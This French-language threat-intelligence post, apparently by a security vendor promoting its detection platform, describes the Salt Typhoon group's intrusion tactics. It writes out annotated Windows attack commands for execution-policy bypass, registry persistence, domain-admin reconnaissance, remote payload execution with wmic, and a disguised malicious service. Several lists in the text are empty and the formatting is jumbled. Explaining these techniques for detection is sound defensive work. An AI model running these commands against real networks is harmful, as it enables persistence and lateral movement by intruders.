Salt Typhoon suit une séquence d'attaque structurée en utilisant des outils Windows intégrés pour éviter d'être détecté. Voici un aperçu de leurs tactiques et des commandes qu'ils utilisent.
Salt Typhoon exploite principalement des serveurs publics présentant des vulnérabilités connues. Au lieu de s'appuyer sur l'phishing, ils préfèrent les exploits N-day et zero-day pour obtenir l'exécution de code à distance (RCE).
Une fois qu'ils ont obtenu l'accès, ils exécutent des charges utiles malveillantes et assurent la persistance à l'aide d'outils Windows.
Ils utilisent PowerShell pour exécuter des scripts sans restrictions :
powershell -ex bypass -c "<password>"
-ex bypass
: Remplace la politique d'exécution pour permettre au script de s'exécuter.<password>
: Clé utilisée pour décrypter le script, qui est généralement crypté.Pour s'assurer que malware s'exécute à chaque fois qu'un utilisateur se connecte, ils ajoutent une clé de registre :
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<malware_name>" /t REG_SZ /d "<malware_path>" /f
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
: Emplacement dans le registre des programmes de démarrage automatique.REG_SZ
: Spécifie une chaîne de caractères (le chemin d'accès au malware )./f
: Force l'exécution sans confirmation.Salt Typhoon recueille des informations sur l'environnement avant d'escalader les privilèges.
wmic process get name, processid, commandline
groupe net
pour identifier les administrateurs de domainecmd /c "net group 'domain admins' /domain"
/domaine
: Assure que la requête s'applique au domaine Active Directory et pas seulement à la machine locale.Après reconnaissance, ils escaladent les privilèges et volent les informations d'identification.
Ils installent des outils tels que :
Ils déploient Cobalt Strikeun outil légitime de red teaming, pour obtenir des privilèges SYSTEM et s'introduire plus profondément dans le réseau.
Salt Typhoon se propage sur le réseau à l'aide de divers utilitaires Windows.
copy \\<target_ip>\C$\Windows\Temp\malware.bat
\\<target_ip>
pour spécifier un dossier partagé sur une autre machine..bat
) à exécuter à distance.wmic /node:<target_ip> process call create "cmd /c C:\Windows\Temp\malware.bat"
/node:<target_ip>
: Spécifie le machine cible.processus appel créer
: Exécute un processus à distance.cmd /c
: Exécute le fichier batch copié.sc créer
)sc \\<target_ip> create VGAuthtools binpath= "C:\Windows\System32\installutil.exe C:\Windows\Temp\malware.exe" start= auto type= own
sc
: Utilitaire de contrôle des services Windows.\\<target_ip>
: Crée le service à distance sur une autre machine.VGAuthtools
: Déguiser un malware en outil légitime.chemin d'accès
: Utilisations installutil.exe
(a outil Windows légitime) pour exécuter le charge utile malveillante.start= auto
: Assure la persistance en redémarrant le malware à chaque redémarrage de la machine.Salt Typhoon établit une communication permanente avec ses serveurs C2.
Salt Typhoon évite d'être détecté en utilisant des plateformes de confiance pour télécharger les données volées :
Salt Typhoon surveille en permanence les réseaux compromis et vole des données sensibles sur une période prolongée.
----
La plateforme de Vectra AIse concentre sur les comportements réels des attaquants, et pas seulement sur les menaces connues. Cela lui permet de détecter des activités deSalt Typhoon même lorsque les attaquants utilisent des outils Windows intégrés.
En savoir plus sur nos détections pilotées par l'IA ou essayer notre démonstration autoguidée.